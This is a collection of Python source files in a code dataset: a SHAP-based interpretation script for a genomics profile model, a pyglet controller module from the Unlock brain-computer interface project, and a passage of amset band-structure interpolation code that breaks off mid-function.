+{"seq_id":"119654893","text":"from collections import OrderedDict\nfrom seqdataloader.batchproducers import coordbased\nfrom seqdataloader.batchproducers.coordbased import coordstovals\nfrom seqdataloader.batchproducers.coordbased import coordbatchproducers\nfrom seqdataloader.batchproducers.coordbased import coordbatchtransformers\nfrom seqdataloader.batchproducers.coordbased.core import Coordinates\nfrom seqdataloader.batchproducers.coordbased.coordstovals.core import CoordsToValsJoiner\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import AbstractCountAndProfileTransformer \nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import LogCountsPlusOne\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import SmoothProfiles\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import BigWigReader \nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import smooth_profiles\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import rolling_window\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import MultiTrackCountsAndProfile\nfrom keras_genomics.layers.convolutional import RevCompConv1D\nfrom seqdataloader.batchproducers.coordbased.core import Coordinates, KerasBatchGenerator, apply_mask\nimport keras\nimport keras.layers as kl\nfrom keras.models import load_model\nfrom keras.utils import CustomObjectScope\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport optparse\nimport os\n\nparser = optparse.OptionParser()\n\nparser.add_option('--gpus',\n action=\"store\", dest=\"gpus\",\n help=\"which gpus to use\", default=None)\nparser.add_option('--assay',\n action=\"store\", dest=\"assay\",\n help=\"which control to use\", default=None)\nparser.add_option('--task_names',\n action=\"store\", dest=\"task_names\",\n help=\"what are the tasks\", default=None)\nparser.add_option('--out_pred_len',\n action=\"store\", dest=\"out_pred_len\",\n help=\"length of predicted profile\", default=None)\nparser.add_option('--peaks_bed',\n action=\"store\", dest=\"peaks_bed\",\n help=\"where are the peaks\", default=None)\nparser.add_option('--model',\n action=\"store\", dest=\"model\",\n help=\"where is the model\", default=None)\nparser.add_option('--output_dir',\n action=\"store\", dest=\"output_dir\",\n help=\"where to store end result\", default=None)\n\noptions, args = parser.parse_args()\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=options.gpus\n\ndef multinomial_nll(true_counts, logits):\n \"\"\"Compute the multinomial negative log-likelihood\n Args:\n true_counts: observed count values\n logits: predicted logit values\n \"\"\"\n counts_per_example = tf.reduce_sum(true_counts, axis=-1)\n dist = tfp.distributions.Multinomial(total_count=counts_per_example,\n logits=logits)\n return (-tf.reduce_sum(dist.log_prob(true_counts)) / \n tf.to_float(tf.shape(true_counts)[0]))\n\n#from https://github.com/kundajelab/basepair/blob/cda0875571066343cdf90aed031f7c51714d991a/basepair/losses.py#L87\nclass MultichannelMultinomialNLL(object):\n def __init__(self, n):\n self.__name__ = \"MultichannelMultinomialNLL\"\n self.n = n\n\n def __call__(self, true_counts, logits):\n for i in range(self.n):\n loss = multinomial_nll(true_counts[..., i], logits[..., i])\n if i == 0:\n total = loss\n else:\n total += loss\n return total\n\n def get_config(self):\n return {\"n\": self.n}\n\nwith CustomObjectScope({'MultichannelMultinomialNLL': MultichannelMultinomialNLL,'RevCompConv1D': RevCompConv1D}):\n model = load_model(options.model)\n\nseq_len = 546\nout_pred_len = int(options.out_pred_len)\ntask_names = options.task_names.split(',')\npos_neg_smooth_log_counts =\\\n coordstovals.bigwig.PosAndNegSmoothWindowCollapsedLogCounts(\n pos_strand_bigwig_path=\"/users/amr1/pho4/data/ctl_\"+options.assay+\"/\"+options.assay+\".pos_strand.bw\",\n neg_strand_bigwig_path=\"/users/amr1/pho4/data/ctl_\"+options.assay+\"/\"+options.assay+\".neg_strand.bw\",\n counts_mode_name=\"control_logcount\",\n profile_mode_name=\"control_profile\",\n center_size_to_use=out_pred_len,\n smoothing_windows=[1,50])\n\ninputs_coordstovals = coordstovals.core.CoordsToValsJoiner(\n coordstovals_list=[\n coordbased.coordstovals.fasta.PyfaidxCoordsToVals(\n genome_fasta_path=\"/users/amr1/pho4/data/genome/sacCer3.genome.fa\",\n mode_name=\"sequence\",\n center_size_to_use=seq_len),\n pos_neg_smooth_log_counts])\n\ntargets_coordstovals = coordstovals.core.CoordsToValsJoiner(\n coordstovals_list=[\n coordstovals.bigwig.PosAndNegSeparateLogCounts(\n counts_mode_name=task+\".logcount\",\n profile_mode_name=task+\".profile\",\n pos_strand_bigwig_path=\"/users/amr1/pho4/data/\"+task+\"_pbexo/basename_prefix.pooled.positive.bigwig\",\n neg_strand_bigwig_path=\"/users/amr1/pho4/data/\"+task+\"_pbexo/basename_prefix.pooled.negative.bigwig\",\n center_size_to_use=out_pred_len) for task in task_names])\n\nkeras_test_batch_generator = coordbased.core.KerasBatchGenerator(\n coordsbatch_producer=coordbatchproducers.SimpleCoordsBatchProducer(\n bed_file=options.peaks_bed,\n batch_size=64,\n shuffle_before_epoch=False, \n seed=1234),\n inputs_coordstovals=inputs_coordstovals,\n targets_coordstovals=targets_coordstovals)\n\nimport numpy as np\n\ndef extend_generator(generator):\n samp_inputs, samp_targets = generator[0]\n concat_inputs = OrderedDict([(key, []) for key in samp_inputs.keys()])\n concat_targets = OrderedDict([(key, []) for key in samp_targets.keys()])\n for batch_idx in range(len(generator)):\n batch_inputs, batch_targets = generator[batch_idx]\n for key in batch_inputs:\n concat_inputs[key].extend(batch_inputs[key])\n for key in batch_targets:\n concat_targets[key].extend(batch_targets[key])\n for key in concat_inputs:\n concat_inputs[key] = np.array(concat_inputs[key])\n for key in concat_targets:\n concat_targets[key] = np.array(concat_targets[key])\n return (concat_inputs, concat_targets)\n\ntest_inputs, test_targets = extend_generator(keras_test_batch_generator)\n\nfor idx in range(len(task_names)):\n print(model.outputs[idx])\n print(model.outputs[idx+len(task_names)])\n print(task_names[idx])\n \nimport shap\nfrom deeplift.dinuc_shuffle import dinuc_shuffle\n\ndef combine_mult_and_diffref(mult, orig_inp, bg_data):\n to_return = []\n for l in [0]:\n projected_hypothetical_contribs = np.zeros_like(bg_data[l]).astype(\"float\")\n assert len(orig_inp[l].shape)==2\n #At each position in the input sequence, we iterate over the one-hot encoding\n # possibilities (eg: for genomic sequence, this is ACGT i.e.\n # 1000, 0100, 0010 and 0001) and compute the hypothetical \n # difference-from-reference in each case. We then multiply the hypothetical\n # differences-from-reference with the multipliers to get the hypothetical contributions.\n #For each of the one-hot encoding possibilities,\n # the hypothetical contributions are then summed across the ACGT axis to estimate\n # the total hypothetical contribution of each position. This per-position hypothetical\n # contribution is then assigned (\"projected\") onto whichever base was present in the\n # hypothetical sequence.\n #The reason this is a fast estimate of what the importance scores *would* look\n # like if different bases were present in the underlying sequence is that\n # the multipliers are computed once using the original sequence, and are not\n # computed again for each hypothetical sequence.\n for i in range(orig_inp[l].shape[-1]):\n hypothetical_input = np.zeros_like(orig_inp[l]).astype(\"float\")\n hypothetical_input[:,i] = 1.0\n hypothetical_difference_from_reference = (hypothetical_input[None,:,:]-bg_data[l])\n hypothetical_contribs = hypothetical_difference_from_reference*mult[l]\n projected_hypothetical_contribs[:,:,i] = np.sum(hypothetical_contribs,axis=-1) \n to_return.append(np.mean(projected_hypothetical_contribs,axis=0))\n to_return.append(np.zeros_like(orig_inp[1]))\n return to_return\n\ndef shuffle_several_times(s):\n numshuffles=20\n return [np.array([dinuc_shuffle(s[0]) for i in range(numshuffles)]),\n np.array([s[1] for i in range(numshuffles)])]\n\nprofile_model_counts_explainer = [shap.explainers.deep.TFDeepExplainer(\n ([model.input[0], model.input[1]],\n tf.reduce_sum(model.outputs[idx],axis=-1)),\n shuffle_several_times,\n combine_mult_and_diffref=combine_mult_and_diffref) for idx in range(len(task_names))]\n\nprofile_model_profile_explainer = []\nfor idx in range(len(task_names), 2*len(task_names)):\n #See Google slide deck for explanations\n #We meannorm as per section titled \"Adjustments for Softmax Layers\"\n # in the DeepLIFT paper\n meannormed_logits = (\n model.outputs[idx]-\n tf.reduce_mean(model.outputs[idx],axis=1)[:,None,:])\n #'stop_gradient' will prevent importance from being propagated through\n # this operation; we do this because we just want to treat the post-softmax\n # probabilities as 'weights' on the different logits, without having the\n # network explain how the probabilities themselves were derived\n #Could be worth contrasting explanations derived with and without stop_gradient\n # enabled...\n stopgrad_meannormed_logits = tf.stop_gradient(meannormed_logits)\n softmax_out = tf.nn.softmax(stopgrad_meannormed_logits,axis=1)\n #Weight the logits according to the softmax probabilities, take the sum for each\n # example. This mirrors what was done for the bpnet paper.\n weightedsum_meannormed_logits = tf.reduce_sum(softmax_out*meannormed_logits,\n axis=(1,2))\n profile_model_profile_explainer.append(shap.explainers.deep.TFDeepExplainer(\n ([model.input[0], model.input[2]],\n weightedsum_meannormed_logits),\n shuffle_several_times,\n combine_mult_and_diffref=combine_mult_and_diffref))\n\ntest_seqs = []\ntest_preds_logcount = []\ntest_biastrack_logcount = []\ntest_biastrack_profile = []\ntest_preds_profile = []\ntest_labels_logcount = []\ntest_labels_profile = []\n\nfor batch_idx in range(len(keras_test_batch_generator)):\n batch_inputs, batch_labels = keras_test_batch_generator[batch_idx]\n test_seqs.append(batch_inputs['sequence']) \n test_biastrack_logcount.append(batch_inputs['control_logcount'])\n test_biastrack_profile.append(batch_inputs['control_profile']) \n test_preds = model.predict(batch_inputs)\n test_preds_logcount.append(test_preds[:len(task_names)])\n test_preds_profile.append(test_preds[len(task_names):])\n test_labels_logcount.append([batch_labels[task+'.logcount'] for task in task_names])\n test_labels_profile.append([batch_labels[task+'.profile'] for task in task_names])\ntest_seqs = np.concatenate(test_seqs,axis=0)\ntest_biastrack_logcount = np.concatenate(test_biastrack_logcount, axis=0)\ntest_biastrack_profile = np.concatenate(test_biastrack_profile,axis=0)\ntest_preds_logcount = np.concatenate(test_preds_logcount, axis=1)\ntest_preds_profile = np.concatenate(test_preds_profile, axis=1)\ntest_labels_logcount = np.concatenate(test_labels_logcount, axis=1)\ntest_labels_profile = np.concatenate(test_labels_profile, axis=1)\n\ntest_post_counts_hypimps = [profile_model_counts_explainer[idx].shap_values(\n [test_seqs, np.zeros((len(test_seqs), 1))],\n progress_message=10)[0] for idx in range(len(task_names))]\ntest_post_profile_hypimps = [profile_model_profile_explainer[idx].shap_values(\n [test_seqs, np.zeros((len(test_seqs), out_pred_len, 2))],\n progress_message=10) [0] for idx in range(len(task_names))]\ntest_post_counts_hypimps = np.array(test_post_counts_hypimps)\ntest_post_profile_hypimps = np.array(test_post_profile_hypimps)\ntest_post_counts_actualimps = test_post_counts_hypimps*test_seqs\ntest_post_profile_actualimps = test_post_profile_hypimps*test_seqs\n\nnp.save(options.output_dir+'post_counts_hypimps.npy', test_post_counts_hypimps)\nnp.save(options.output_dir+'post_profile_hypimps.npy', test_post_profile_hypimps) \nnp.save(options.output_dir+'post_counts_actualimps.npy', test_post_counts_actualimps) \nnp.save(options.output_dir+'post_profile_actualimps.npy', test_post_profile_actualimps) \nnp.save(options.output_dir+'labels_profile.npy', test_labels_profile) \nnp.save(options.output_dir+'labels_logcount.npy', test_labels_logcount) \nnp.save(options.output_dir+'preds_profile.npy', test_preds_profile) \nnp.save(options.output_dir+'biastrack_profile.npy', test_biastrack_profile) \nnp.save(options.output_dir+'biastrack_logcount.npy', test_biastrack_logcount) \nnp.save(options.output_dir+'preds_logcount.npy', test_preds_logcount) \nnp.save(options.output_dir+'seqs.npy', test_seqs) ","sub_path":"old_experiments/interpretModelExo.py","file_name":"interpretModelExo.py","file_ext":"py","file_size_in_byte":12997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"505874638","text":"# Copyright (c) James Percent, Byron Galbraith and Unlock contributors.\n# All rights reserved.\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of Unlock nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom unlock.bci import PygletKeyboardCommand\nimport logging\nimport pyglet\nimport inspect\nimport time\nimport os\n\n\nclass UnlockController(object):\n def __init__(self, window, views, batches, command_receiver, poll_signal_frequency,\n standalone=False):\n super(UnlockController, self).__init__()\n self.window = window\n self.views = views\n self.batches = set([])\n if batches:\n self.batches = self.batches.union(batches)\n \n self.command_receiver = command_receiver\n self.standalone = standalone\n self.poll_signal_frequency = poll_signal_frequency\n \n def poll_signal(self, delta):\n command = self.command_receiver.next_command(delta)\n\n if command.stop:\n self.window.handle_stop_request()\n else:\n self.update_state(command)\n self.render()\n\n #if command.stop:\n # self.window.handle_stop_request()\n\n def update_state(self, command):\n ''' Subclass hook '''\n pass\n \n def keyboard_input(self, command):\n self.update_state(command)\n self.render()\n \n def activate(self):\n self.window.activate_controller(self)\n \n def deactivate(self):\n self.window.deactivate_controller()\n return self.standalone\n \n def render(self):\n self.window.render()\n \n \nclass UnlockControllerChain(UnlockController):\n def __init__(self, window, command_receiver, controllers, name, icon,\n poll_signal_frequency=1.0/512.0, standalone=False):\n \n assert controllers and len(controllers) > 0\n \n views = []\n batches = set([])\n for controller in controllers:\n if controller.views:\n views.extend(controller.views) \n \n if controller.batches:\n batches = batches.union(controller.batches)\n \n super(UnlockControllerChain, self).__init__(window, views, batches,\n command_receiver, poll_signal_frequency, standalone=standalone)\n self.controllers = controllers\n self.name = name\n self.icon = icon\n self.standalone = standalone\n\n self.icon_path = os.path.join(os.path.dirname(inspect.getabsfile(UnlockControllerChain)),\n 'resource', self.icon)\n\n def update_state(self, command):\n for controller in self.controllers:\n controller.update_state(command)\n \n def keyboard_input(self, command):\n for controller in self.controllers:\n controller.keyboard_input(command)\n self.render()\n \n def activate(self):\n for controller in self.controllers:\n controller.activate()\n super(UnlockControllerChain, self).activate()\n \n def deactivate(self):\n for controller in self.controllers:\n controller.deactivate()\n \n self.window.deactivate_controller() \n return self.standalone\n \n def render(self):\n super(UnlockControllerChain, self).render()\n \n \nclass UnlockControllerFragment(UnlockController):\n \"\"\"\n A controller fragment is a controller that can be 'mixedin' with other fragments. It is not\n intended to be a stand alone controller. For a stand alone controller use/subclass\n UnlockController or UnlockControllerChain.\n \"\"\"\n def __init__(self, model, views, batch, check_command_validity=False):\n super(UnlockControllerFragment, self).__init__(None, None, None, None, None, None)\n self.model = model\n self.views = views\n self.batches.add(batch)\n self.check_command_validity = check_command_validity\n self.poll_signal = None\n self.render = None\n \n def update_state(self, command):\n if command and self.model:\n if self.check_command_validity and not command.is_valid():\n return\n \n self.model.process_command(command)\n \n def keyboard_input(self, command):\n if self.model:\n self.model.process_command(command)\n \n def activate(self):\n if self.model:\n self.model.start()\n \n def deactivate(self):\n if self.model:\n self.model.stop()\n return self.standalone\n \n \nclass UnlockCommandConnectedFragment(UnlockControllerFragment):\n def __init__(self, command_receiver, timed_stimuli, views, batch):\n assert timed_stimuli\n super(UnlockCommandConnectedFragment, self).__init__(timed_stimuli, views, batch)\n self.command_receiver = command_receiver\n \n def keyboard_input(self,command):\n pass\n \n def activate(self):\n assert self.command_receiver\n super(UnlockCommandConnectedFragment, self).activate()\n self.command_receiver.start()\n \n def deactivate(self):\n assert self.command_receiver\n self.command_receiver.stop()\n super(UnlockCommandConnectedFragment, self).deactivate()\n \n \nclass UnlockCalibratedControllerFragment(UnlockControllerFragment):\n def __init__(self, window, model, views, batch, calibrator=None):\n super(UnlockCalibratedControllerFragment, self).__init__(model, views, batch)\n self.window = window\n self.calibrator = calibrator\n if calibrator:\n self.initialized = False\n else:\n self.initialized = True \n \n def initialize(self):\n self.calibrator.activate()\n self.initialized = True\n \n def poll_signal_interceptor(self, delta):\n if not self.initialized:\n self.initialize()\n return\n self.poll_signal(delta)\n \n \nclass UnlockDashboard(UnlockCalibratedControllerFragment):\n def __init__(self, window, model, views, batch, controllers, calibrator):\n super(UnlockDashboard, self).__init__(window, model, views, batch, calibrator)\n self.controllers = controllers\n self.logger = logging.getLogger(__name__)\n \n \nclass PygletWindow(pyglet.window.Window):\n def __init__(self, signal, fullscreen=False, show_fps=True, vsync=False):\n super(PygletWindow, self).__init__(fullscreen=fullscreen, vsync=vsync)\n self.signal = signal\n self.controller_stack = []\n self.views = []\n self.batches = set([])\n if show_fps:\n self.fps = pyglet.clock.ClockDisplay().draw\n else:\n def empty():\n pass\n self.fps = empty\n self.active_controller = None\n \n @self.event\n def on_key_press(symbol, modifiers):\n command = PygletKeyboardCommand(symbol, modifiers)\n if command.stop:\n return self.handle_stop_request()\n if self.active_controller and (command.decision or command.selection):\n self.active_controller.keyboard_input(command)\n \n @self.event\n def on_close():\n pass\n \n def render(self):\n self.clear()\n for view in self.views:\n view.render()\n for batch in self.batches:\n if batch:\n batch.draw()\n self.fps()\n \n def handle_stop_request(self):\n if self.active_controller:\n stop = self.active_controller.deactivate()\n if stop:\n self.signal.stop()\n self.signal.close()\n pyglet.app.exit() \n return pyglet.event.EVENT_HANDLED\n else:\n self.signal.stop()\n self.signal.close()\n pyglet.app.exit()\n \n def activate_controller(self, controller):\n if self.active_controller:\n self.controller_stack.append(self.active_controller)\n pyglet.clock.unschedule(self.active_controller.poll_signal) \n \n self.views = controller.views\n self.batches = controller.batches\n pyglet.clock.schedule(controller.poll_signal)#, controller.poll_signal_frequency)\n self.active_controller = controller\n \n def deactivate_controller(self):\n if self.active_controller:\n self.views = []\n self.batches = set([])\n pyglet.clock.unschedule(self.active_controller.poll_signal)\n self.active_controller = None\n \n if len(self.controller_stack) > 0:\n controller = self.controller_stack[-1]\n controller.activate()\n self.controller_stack = self.controller_stack[:-1]\n \n def start(self):\n pyglet.app.run()\n\nclass Canvas(object):\n def __init__(self, batch, width, height, xoffset=0, yoffset=0):\n self.batch = batch\n self.width = width\n self.height = height\n self.x = xoffset\n self.y = yoffset\n \n def center(self):\n return self.xcenter(), self.ycenter()\n \n def xcenter(self):\n return self.width / 2 + self.x\n \n def ycenter(self):\n return self.height / 2 + self.y\n \n","sub_path":"unlock/controller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":10842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"573482181","text":"import numpy as np\nimport warnings\n\nfrom amset.utils.analytical_band_from_bzt1 import Analytical_bands, get_energy\nfrom amset.utils.band_structure import kpts_to_first_BZ, get_bindex_bspin, \\\n get_closest_k\nfrom amset.utils.constants import Ry_to_eV, hbar, A_to_m, m_to_cm, e, m_e, \\\n Hartree_to_eV\nfrom amset.utils.detect_peaks import detect_peaks\nfrom amset.utils.general import outer, AmsetError, norm\nfrom multiprocessing import cpu_count\nfrom multiprocessing.pool import Pool\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\nfrom pymatgen.symmetry.bandstructure import HighSymmKpath\n\ntry:\n import BoltzTraP2\n import BoltzTraP2.dft\n from BoltzTraP2 import sphere, fite\nexcept ImportError:\n warnings.warn('BoltzTraP2 not imported; \"boltztrap2\" interpolation not available.')\n\n\ndef get_energy_args(coeff_file, ibands):\n \"\"\"\n Args:\n coeff_file (str): the address to the cube (*.123) file\n ibands ([int]): list of band numbers to be calculated; note that the\n first band index is 1 not 0\n\n Returns (tuple): necessary inputs for calc_analytical_energy or get_energy\n \"\"\"\n analytical_bands = Analytical_bands(coeff_file=coeff_file)\n try:\n engre, latt_points, nwave, nsym, nsymop, symop, br_dir = \\\n analytical_bands.get_engre(iband=ibands)\n except TypeError as e:\n raise ValueError('try reducing max_Ecut to include fewer bands', e)\n\n nstv, vec, vec2 = analytical_bands.get_star_functions(\n latt_points, nsym, symop, nwave, br_dir=br_dir)\n out_vec2 = np.zeros((nwave, max(nstv), 3, 3))\n for nw in range(nwave):\n for i in range(nstv[nw]):\n out_vec2[nw, i] = outer(vec2[nw, i], vec2[nw, i])\n return engre, nwave, nsym, nstv, vec, vec2, out_vec2, br_dir\n\n\ndef interpolate_bs(kpts, interp_params, iband, sgn=None, method=\"boltztrap1\",\n scissor=0.0, matrix=None, n_jobs=1, return_mass=True):\n \"\"\"\n Args:\n kpts ([1x3 array]): list of fractional coordinates of k-points\n interp_params (tuple): a tuple or list containing positional\n arguments fed to the interpolation method.\n e.g. for boltztrap1:\n engre, nwave, nsym, stv, vec, vec2, out_vec2, br_dir\n and for boltztrap2:\n (equivalences, lattvec, coeffs)\n iband (int): the band index for which the list of energy, velocity\n and mass is returned. If \"boltztrap2\" method is used, this is the\n actual band index while if \"boltztrap1\" methid is used, this is the\n ith band among the bands that were included in the fit (i.e. when\n get_energy_args is called)\n sgn (float): options are +1 for valence band and -1 for conduction bands\n sgn is basically ignored (doesn't matter) if scissor==0.0\n method (str): the interpolation method. Current options are\n \"boltztrap1\", \"boltztrap2\"\n scissor (float): the amount by which the band gap is modified/scissored\n matrix (3x3 np.ndarray): the direct lattice matrix used to convert\n the velocity (in fractional coordinates) to cartesian in\n boltztrap1 method.\n n_jobs (int): number of processes used in boltztrap1 interpolation\n return_mass (bool): whether to return the effective mass values or not\n\n Returns (tuple of energies, velocities, masses lists/np.ndarray):\n energies ([float]): energy values at kpts for a corresponding iband\n velocities ([3x1 array]): velocity vectors\n masses ([3x3 matrix]): list of effective mass tensors\n \"\"\"\n #TODO: effective mass is still inconsistent between btp1 and btp2 w/o any transformation used since it is not used in Amset ok but has to be checked with the right transformation\n if matrix is None:\n matrix = np.eye(3)\n if not sgn:\n if scissor == 0.0:\n sgn=0.0\n else:\n raise ValueError('To apply scissor \"sgn\" is required: -1 or +1')\n masses = []\n if method==\"boltztrap1\":\n engre, nwave, nsym, nstv, vec, vec2, out_vec2, br_dir = interp_params\n energies = []\n velocities = []\n if n_jobs == 1:\n results = []\n for kpt in kpts:\n result = get_energy(kpt, engre[iband], nwave, nsym,\n nstv, vec, vec2, out_vec2, br_dir,\n return_dde=return_mass)\n results.append(result)\n else:\n inputs = [(kpt, engre[iband], nwave, nsym, nstv, vec, vec2,\n out_vec2, br_dir) for kpt in kpts]\n with Pool(n_jobs if n_jobs != -1 else cpu_count()) as p:\n results = p.starmap(get_energy, inputs)\n for result in results:\n energy = result[0] * Ry_to_eV - sgn * scissor / 2.0\n velocity = abs(np.dot(matrix/np.linalg.norm(matrix), result[1])) / hbar / 0.52917721067 * A_to_m * m_to_cm * Ry_to_eV\n if return_mass:\n effective_m = 1/(result[2]/ 0.52917721067**2*Ry_to_eV) * e / A_to_m**2 * hbar**2 / m_e\n masses.append(effective_m)\n energies.append(energy)\n velocities.append(velocity)\n elif method==\"boltztrap2\":\n if n_jobs != 1:\n warnings.warn('n_jobs={}: Parallel not implemented w/ boltztrap2'\n .format(n_jobs))\n equivalences, lattvec, coeffs = interp_params\n fitted = fite.getBands(np.array(kpts), equivalences, lattvec, coeffs,\n curvature=return_mass)\n energies = fitted[0][iband - 1] * Hartree_to_eV - sgn * scissor / 2.\n velocities = abs(np.matmul(matrix/np.linalg.norm(matrix), fitted[1][:, iband - 1, :]).T) * Hartree_to_eV / hbar * A_to_m * m_to_cm / 0.52917721067\n if return_mass:\n masses = 1/(fitted[2][:, :, iband - 1, :].T/ 0.52917721067**2*Hartree_to_eV)* e / A_to_m**2 * hbar**2/m_e\n else:\n raise AmsetError(\"Unsupported interpolation method: {}\".format(method))\n if return_mass:\n return energies, velocities, masses\n else:\n return energies, velocities\n\n\ndef get_dos_boltztrap2(params, st, mesh, estep=0.001, vbmidx=None,\n width=0.2, scissor=0.0):\n \"\"\"\n Calculates the density of states (DOS) based on boltztrap2 interpolation.\n\n Args:\n params (list/tuple): parameters required for boltztrap2 interpolation\n st (pymatgen Structure object): required for generating irriducible\n brillouin zone mesh)\n mesh (a 3x1 list or np.ndarray): the k-grid; e.g. [13, 15, 11]\n estep (float): small energy step, the smaller better but more expensive\n vbmidx (int): the index of the valence band maximum assuming the index\n of the first band is 0\n width (float): energy bandwidth/smearing parameter.\n scissor (float): the intended change to the current band gap\n\n Returns (tuple): in the same order: 1) list of enegy values 2) list of\n densities at those energy values and 3) number of bands considered\n \"\"\"\n from BoltzTraP2 import fite\n (equivalences, lattvec, coeffs) = params\n ir_kpts = SpacegroupAnalyzer(st).get_ir_reciprocal_mesh(mesh)\n ir_kpts = [k[0] for k in ir_kpts]\n weights = [k[1] for k in ir_kpts]\n w_sum = float(sum(weights))\n weights = [w / w_sum for w in weights]\n\n energies, _ = fite.getBands(np.array(ir_kpts), equivalences=equivalences,\n lattvec=lattvec, coeffs=coeffs)\n energies *= Hartree_to_eV # shape==(bands, nkpoints)\n nbands = energies.shape[0]\n if vbmidx:\n ib_start = max(0, vbmidx-4)\n ib_end = min(energies.shape[0], vbmidx+1+4)\n energies[vbmidx + 1:, :] += scissor / 2.\n energies[:vbmidx + 1, :] -= scissor / 2.\n energies = energies[ib_start:ib_end, :]\n nbands = ib_end - ib_start\n e_min = np.min(energies)\n e_max = np.max(energies)\n height = 1.0 / (width * np.sqrt(2 * np.pi))\n e_points = int(round((e_max - e_min) / estep))\n e_mesh, step = np.linspace(e_min, e_max, num=e_points, endpoint=True,\n retstep=True)\n e_range = len(e_mesh)\n dos = np.zeros(e_range)\n\n for ik, w in enumerate(weights):\n for b in range(nbands):\n g = height * np.exp(-((e_mesh - energies[b, ik]) / width) ** 2 / 2.)\n dos += w * g\n return e_mesh, dos, nbands\n\n\ndef get_bs_extrema(bs, coeff_file=None, interp_params=None, method=\"boltztrap1\",\n line_density=30, min_normdiff=4.0,\n Ecut=None, eref=None, return_global=False, n_jobs=-1,\n nbelow_vbm=0, nabove_cbm=0, scissor=0.0):\n \"\"\"\n Returns a dictionary of p-type (valence) and n-type (conduction) band\n extrema k-points by looking at the 1st and 2nd derivatives of the bands\n\n Args:\n bs (pymatgen BandStructure object): must contain Structure and have\n the same number of valence electrons and settings as the vasprun.xml\n from which coeff_file is generated.\n coeff_file (str): path to the cube file from BoltzTraP run\n line_density (int): maximum number of k-points between each two\n consecutive high-symmetry k-points\n v_cut (float): threshold under which the derivative is assumed 0 [cm/s]\n min_normdiff (float): the minimum allowed distance\n norm(cartesian k in 1/nm) in extrema; this is important to avoid\n numerical instability errors or finding peaks that are too close\n to each other for Amset formulation to be relevant.\n Ecut (float or dict): max energy difference with CBM/VBM allowed for\n extrema. Valid examples: 0.25 or {'n': 0.5, 'p': 0.25} , ...\n eref (dict): BandStructure global VBM/CBM used as a global reference\n energy for Ecut. Example: {'n': 6.0, 'p': 5.0}. Ignored if None in\n which case maximum/minimum of the current valence/conduction used\n return_global (bool): in addition to the extrema, return the actual\n CBM (global minimum) and VBM (global maximum) w/ their k-point\n n_jobs (int): number of processors used in boltztrap1 interpolation\n nbelow_vbm (int): # of bands below the last valence band\n nabove_vbm (int): # of bands above the first conduction band\n scissor (float): the amount by which the band gap is altered/scissored.\n\n Returns (dict): {'n': list of extrema fractional coordinates, 'p': same}\n \"\"\"\n lattice_matrix = bs.structure.lattice.reciprocal_lattice.matrix\n def to_cart(k):\n \"\"\"\n convert fractional k-points to cartesian coordinates in (1/nm) units\n \"\"\"\n return np.dot(lattice_matrix, k)*10.\n Ecut = Ecut or 10 * k_B * 300\n if not isinstance(Ecut, dict):\n Ecut = {'n': Ecut, 'p': Ecut}\n if eref is None:\n global_extrema = {'n': {}, 'p': {}}\n else:\n cbmk = np.array(bs.get_cbm()['kpoint'].frac_coords)\n vbmk = np.array(bs.get_vbm()['kpoint'].frac_coords)\n global_extrema = {'n': {'energy': eref['n'], 'kpoint': cbmk},\n 'p': {'energy': eref['p'], 'kpoint': vbmk}}\n final_extrema = {'n': [], 'p': []}\n hsk = HighSymmKpath(bs.structure)\n\n hs_kpoints, _ = hsk.get_kpoints(line_density=line_density)\n hs_kpoints = kpts_to_first_BZ(hs_kpoints)\n vbm_idx, _ = get_bindex_bspin(bs.get_vbm(), is_cbm=False)\n cbm_idx, _ = get_bindex_bspin(bs.get_cbm(), is_cbm=True)\n\n if method == \"boltztrap1\" and interp_params is None:\n interp_params = get_energy_args(coeff_file=coeff_file,\n ibands=[vbm_idx + 1 - nbelow_vbm,\n cbm_idx + 1 + nabove_cbm])\n\n for ip, tp in enumerate([\"p\", \"n\"]): # hence iband == 0 or 1\n if method==\"boltztrap1\":\n iband = ip\n else:\n iband = ip*(cbm_idx+nabove_cbm) + (1-ip)*(vbm_idx-nbelow_vbm) + 1\n band , _, _ = interpolate_bs(hs_kpoints, interp_params, iband=iband,\n method=method, scissor=scissor,\n matrix=bs.structure.lattice.matrix,\n n_jobs=n_jobs, sgn=(-1)**ip)\n global_ext_idx = (1-iband) * 